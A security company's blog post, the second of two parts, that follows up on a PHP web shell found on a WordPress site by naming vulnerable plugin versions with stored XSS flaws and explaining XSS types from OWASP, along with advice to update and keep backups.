This is the second part of our exploration MulCiShell Backdoor and File Uploader, a malicious PHP Web Shell that was detected on a customer’s website using CodeGuard’s MalwareGone tool. If you haven’t already, take a look at Part I before continuing. In this post, we’ll wrap things up by discussing the vulnerabilities that were found on this site, which may have allowed the MulCiShell Backdoor and File Uploader to be inserted. To pick up where we left off before, here is a list of installed WordPress plugins installed on the hijacked site:
A search on the WPScan Vulnerability Database reveals a number of public vulnerabilities for some of these plugins. Here are a few examples:
- WordPress Plugin: Akismet
Version installed: 3.0.4
Vulnerability: Unauthenticated Stored Cross-Site Scripting (XSS)
Versions affected: Akismet 2.5.0-3.1.4
2. WordPress Plugin: iThemes Security (formerly Better WP Security)
Version installed: 5.6.1
Vulnerability: Unauthenticated Stored Cross-Site Scripting
Versions affected: <= 5.6.1
Both of these vulnerabilities are Cross-Site Scripting aka XSS. But do you know what XSS is? According to the highly regarded Open Web Application Security Project, OWASP –
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
- Stored or Persistent – when the malicious code is stored in the site’s database
- Reflected – when the malicious code comes within the victim’s request
- DOM-based – when the vulnerability is in the client-side, that is the Document Object Model of the browser
Persistent XSS Example – Source: http://excess-xss.com/
With this kind of vulnerability, attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert malicious content, redirect users to vulnerable websites, etc. We believe that the attacker was able to exploit one of these vulnerabilities to inject code on the client’s site and with that they were able to upload the malicious files we saw in the first part of this post. This is why it’s important as website owners to keep all of your systems updated and, of course, to have a backup strategy like CodeGuard in place just in case things do go wrong.
If you have any questions or comments don’t hesitate to send them to us! See you next time!
OWASP Foundation – https://www.owasp.org/
OWASP Appsec Tutorial Series – Episode 3: Cross Site Scripting (XSS) – https://www.youtube.com/watch?v=_Z9RQSnf8-g
XSS vulnerability in iThemes Security (formerly Better WP Security) 5.6.1 –